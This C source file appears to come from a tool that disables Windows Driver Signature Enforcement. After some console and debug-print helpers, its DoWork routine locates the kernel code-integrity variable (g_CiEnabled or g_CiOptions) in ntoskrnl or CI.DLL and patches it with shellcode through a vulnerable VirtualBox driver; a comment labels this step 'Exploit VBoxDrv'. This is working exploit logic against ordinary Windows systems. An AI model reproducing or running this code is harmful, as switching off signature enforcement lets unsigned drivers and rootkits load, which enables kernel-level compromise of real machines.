/*
* cuiPrintTextA
*
* Purpose:
*
* Output text to the console or file.
* ANSI version.
*
* Parameters:
*   lpText    - NUL-terminated ANSI string to write. NULL, empty strings and
*               strings longer than MAX_PATH * 4 characters are silently ignored.
*   UseReturn - when TRUE a "\r\n" is appended after the text.
*
* The destination is the global handle g_ConOut: WriteConsoleA is used when
* g_ConsoleOutput is set, WriteFile otherwise (redirected output). The result
* of the write is not checked; this is a best-effort output routine.
*/
VOID cuiPrintTextA(
    _In_ LPSTR lpText,
    _In_ BOOL UseReturn
)
{
    SIZE_T textLength;
    SIZE_T allocSize;
    DWORD bytesWritten = 0;
    LPSTR outBuffer;

    if (lpText == NULL)
        return;

    textLength = _strlen_a(lpText);
    if (textLength == 0)
        return;
    if (textLength > MAX_PATH * 4)
        return;

    //
    // Text + optional "\r\n" (2) + terminator (1), with a little slack.
    //
    allocSize = textLength + 5;
    outBuffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, allocSize);
    if (outBuffer == NULL)
        return;

    _strcpy_a(outBuffer, lpText);
    if (UseReturn != FALSE)
        _strcat_a(outBuffer, "\r\n");

    textLength = _strlen_a(outBuffer);

    if (g_ConsoleOutput == FALSE) {
        WriteFile(g_ConOut, outBuffer, (DWORD)textLength, &bytesWritten, NULL);
    }
    else {
        WriteConsoleA(g_ConOut, outBuffer, (DWORD)textLength, &bytesWritten, NULL);
    }

    HeapFree(GetProcessHeap(), 0, outBuffer);
}
/*
* ShowServiceMessage
*
* Purpose:
*
* Emit a "[DF] "-prefixed message through OutputDebugStringA.
*
* Parameters:
*   lpMsg - NUL-terminated ANSI message. NULL or messages longer than
*           MAX_PATH characters are ignored, so the MAX_PATH * 2 stack buffer
*           always has room for the 5-byte prefix, the message and the NUL.
*/
VOID ShowServiceMessage(
    LPSTR lpMsg
)
{
    CHAR odsBuffer[MAX_PATH * 2];
    SIZE_T msgLength;

    if (lpMsg == NULL)
        return;

    msgLength = _strlen_a(lpMsg);
    if (msgLength > MAX_PATH)
        return;

    //
    // Build "[DF] <message>" and hand it to the debugger/DbgView.
    //
    RtlSecureZeroMemory(odsBuffer, sizeof(odsBuffer));
    _strcpy_a(odsBuffer, "[DF] ");
    _strcat_a(odsBuffer, lpMsg);

    OutputDebugStringA(odsBuffer);
}
/*
* cuiPrintTextA
*
* Purpose:
*
* Output text to the console or file.
*
* ANSI variant
*
* Parameters:
*   hOutConsole          - handle the text is written to.
*   lpText               - NUL-terminated ANSI string. NULL, empty strings and
*                          strings longer than MAX_PATH * 4 characters are
*                          silently ignored.
*   ConsoleOutputEnabled - TRUE selects WriteConsoleA, FALSE selects WriteFile
*                          (redirected/file output).
*   UseReturn            - when TRUE a "\r\n" is appended after the text.
*
* Write failures are not reported; this is a best-effort output routine.
*/
VOID cuiPrintTextA(
    _In_ HANDLE hOutConsole,
    _In_ LPSTR lpText,
    _In_ BOOL ConsoleOutputEnabled,
    _In_ BOOL UseReturn
)
{
    SIZE_T textLength;
    SIZE_T outLength;
    DWORD bytesWritten = 0;
    LPSTR outBuffer;

    if (lpText == NULL)
        return;

    textLength = _strlen_a(lpText);
    if ((textLength == 0) || (textLength > MAX_PATH * 4))
        return;

    //
    // Text bytes + 4 spare bytes (covers the optional "\r\n") + a wide-char
    // sized terminator slot; more than enough for the NUL.
    //
    outLength = textLength * sizeof(CHAR) + 4 + sizeof(UNICODE_NULL);
    outBuffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, outLength);
    if (outBuffer == NULL)
        return;

    _strcpy_a(outBuffer, lpText);
    if (UseReturn != FALSE)
        _strcat_a(outBuffer, "\r\n");

    outLength = _strlen_a(outBuffer);

    if (ConsoleOutputEnabled == FALSE) {
        WriteFile(hOutConsole, outBuffer, (DWORD)(outLength * sizeof(CHAR)), &bytesWritten, NULL);
    }
    else {
        WriteConsoleA(hOutConsole, outBuffer, (DWORD)outLength, &bytesWritten, NULL);
    }

    HeapFree(GetProcessHeap(), 0, outBuffer);
}
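/*
* dsfpQueryMappedImageSize
*
* Purpose:
*
* Look up SizeOfImage of a module already mapped into this process by walking
* the PEB loader InLoadOrderModuleList under the loader lock.
*
* Parameters:
*   DllBase - image base returned by LoadLibrary for the module of interest.
*
* Returns the module's SizeOfImage, or 0 when DllBase is not in the list.
*/
static SIZE_T dsfpQueryMappedImageSize(
    _In_ PVOID DllBase
)
{
    SIZE_T imageSize = 0;
    PLIST_ENTRY head, next;
    PLDR_DATA_TABLE_ENTRY entry;

    EnterCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);

    head = &NtCurrentPeb()->Ldr->InLoadOrderModuleList;
    for (next = head->Flink; next != head; next = next->Flink) {
        entry = CONTAINING_RECORD(next, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
        if (entry->DllBase == DllBase) {
            imageSize = entry->SizeOfImage;
            break;
        }
    }

    LeaveCriticalSection((PRTL_CRITICAL_SECTION)NtCurrentPeb()->LoaderLock);

    return imageSize;
}

/*
* DoWork
*
* Purpose:
*
* Locate the code-integrity variable of the running kernel and patch it
* through the VBoxDrv device.
*
* Parameters:
*   hDevice  - open handle to the VBoxDrv device, passed on to ControlDSE.
*   bDisable - TRUE selects scDisable; FALSE selects the "enable" shellcode
*              for the OS generation (scEnableVista7 on 6.0/6.1, scEnable8Plus
*              otherwise).
*
* Flow:
*   1. Enumerate loaded kernel modules (SystemModuleInformation).
*   2. Pick the target image and its kernel load address: the first module
*      (ntoskrnl) on Vista/7, CI.DLL on 8+/10.
*   3. Map the same file from the system directory into this process with
*      DONT_RESOLVE_DLL_REFERENCES, and let dsfQueryCiEnabled (Vista/7, needs
*      the mapped image size) or dsfQueryCiOptions (8+) locate the variable;
*      both take KernelBase by address and return 0 on failure.
*   4. Hand the resulting kernel address and shellcode to ControlDSE.
*
* Returns TRUE only when ControlDSE succeeds; FALSE on any earlier failure.
* Progress is traced through OutputDebugStringA "[DF] ..." messages.
*
* The do { } while (FALSE) body is the single-exit cleanup pattern: every
* `break` falls through to the FreeLibrary / HeapFree below.
*/
BOOL DoWork(
    HANDLE hDevice,
    BOOL bDisable
)
{
    BOOL bRes = FALSE, bFound, cond;
    ULONG rl = 0, c;
    LONG rel = 0;
    PVOID scBuffer = NULL, MappedKernel = NULL;
    ULONG_PTR KernelBase = 0L;
    SIZE_T ModuleSize;
    PRTL_PROCESS_MODULES miSpace;
    // NOTE(review): both buffers receive system dir (< MAX_PATH) + '\\' + a
    // module file name copied from the 256-byte FullPathName field, plus a
    // short prefix for szOdsText; BUFFER_SIZE is assumed to cover that -- confirm.
    CHAR KernelFullPathName[BUFFER_SIZE];
    CHAR szOdsText[BUFFER_SIZE];

    cond = FALSE;

    do {
        //
        // Enumerate loaded drivers.
        //
        miSpace = supGetSystemInfo(SystemModuleInformation);
        if (miSpace == NULL) {
            break;
        }
        if (miSpace->NumberOfModules == 0) {
            break;
        }

        RtlSecureZeroMemory(KernelFullPathName, sizeof(KernelFullPathName));
        rl = GetSystemDirectoryA(KernelFullPathName, MAX_PATH);
        //
        // 0 means failure; a value >= MAX_PATH is the "required size" reply
        // for a too-small buffer, in which case nothing was written and rl
        // must not be used as an index.
        //
        if ((rl == 0) || (rl >= MAX_PATH)) {
            break;
        }
        KernelFullPathName[rl] = (CHAR)'\\';

        _strcpy_a(szOdsText, "[DF] Windows v");
        ultostr_a(osv.dwMajorVersion, _strend_a(szOdsText));
        _strcat_a(szOdsText, ".");
        ultostr_a(osv.dwMinorVersion, _strend_a(szOdsText));
        OutputDebugStringA(szOdsText);

        //
        // For vista/7 find ntoskrnl.exe (assumed to be the first module).
        //
        bFound = FALSE;
        if (osv.dwMajorVersion == 6) {
            if (osv.dwMinorVersion < 2) {
                _strcpy_a(&KernelFullPathName[rl + 1],
                    (const char*)&miSpace->Modules[0].FullPathName[miSpace->Modules[0].OffsetToFileName]);
                KernelBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
                bFound = TRUE;
            }
        }

        //
        // For 8+, 10 find CI.DLL
        //
        if (bFound == FALSE) {
            _strcpy_a(&KernelFullPathName[rl + 1], CI_DLL);
            for (c = 0; c < miSpace->NumberOfModules; c++) {
                if (_strcmpi_a((const char *)&miSpace->Modules[c].FullPathName[miSpace->Modules[c].OffsetToFileName], CI_DLL) == 0) {
                    KernelBase = (ULONG_PTR)miSpace->Modules[c].ImageBase;
                    break;
                }
            }
        }

        HeapFree(GetProcessHeap(), 0, miSpace);
        miSpace = NULL;

        _strcpy_a(szOdsText, "[DF] Target module ");
        _strcat_a(szOdsText, KernelFullPathName);
        OutputDebugStringA(szOdsText);

        _strcpy_a(szOdsText, "[DF] Module base ");
        u64tohex_a(KernelBase, _strend_a(szOdsText));
        OutputDebugStringA(szOdsText);

        //
        // No kernel load address means the target module was not in the
        // module list (e.g. CI.DLL absent). The offset lookups below would
        // then be applied relative to 0 and ControlDSE would patch a bogus
        // kernel address, so abort here instead.
        //
        if (KernelBase == 0) {
            break;
        }

        //
        // Map ntoskrnl/CI.DLL in our address space.
        //
        MappedKernel = LoadLibraryExA(KernelFullPathName, NULL, DONT_RESOLVE_DLL_REFERENCES);
        if (MappedKernel == NULL) {
            break;
        }

        //
        // Check if we are in NT6.x branch
        //
        if (osv.dwMajorVersion == 6) {
            if (osv.dwMinorVersion < 2) {
                //
                // Find g_CiEnabled Vista, Seven.
                // Query module size via PEB loader for bruteforce.
                //
                ModuleSize = dsfpQueryMappedImageSize(MappedKernel);
                if (ModuleSize == 0) {
                    break;
                }
                rel = dsfQueryCiEnabled(&KernelBase, MappedKernel, (DWORD)ModuleSize);
            }
            else {
                //
                // Find g_CiOptions w8+
                //
                rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
            }
        }
        else {
            //
            // Otherwise > NT6.x, find g_CiOptions 10+
            //
            rel = dsfQueryCiOptions(&KernelBase, MappedKernel);
        }

        if (rel == 0) {
            break;
        }

        _strcpy_a(szOdsText, "[DF] Apply patch to address ");
        u64tohex_a(KernelBase, _strend_a(szOdsText));
        OutputDebugStringA(szOdsText);

        //
        // Select proper shellcode buffer
        //
        if (bDisable) {
            scBuffer = (PVOID)scDisable;
        }
        else {
            //
            // Shellcode for 8/10+, overridden for vista/7.
            //
            scBuffer = (PVOID)scEnable8Plus;
            if ((osv.dwMajorVersion == 6) && (osv.dwMinorVersion < 2)) {
                scBuffer = (PVOID)scEnableVista7;
            }
        }

        //
        // Exploit VBoxDrv.
        //
        bRes = ControlDSE(hDevice, KernelBase, scBuffer);

    } while (cond);

    if (MappedKernel != NULL) {
        FreeLibrary(MappedKernel);
    }
    // Only reached non-NULL after an early break; freed on the process heap
    // (presumably matching supGetSystemInfo's allocation).
    if (miSpace != NULL) {
        HeapFree(GetProcessHeap(), 0, miSpace);
    }

    return bRes;
}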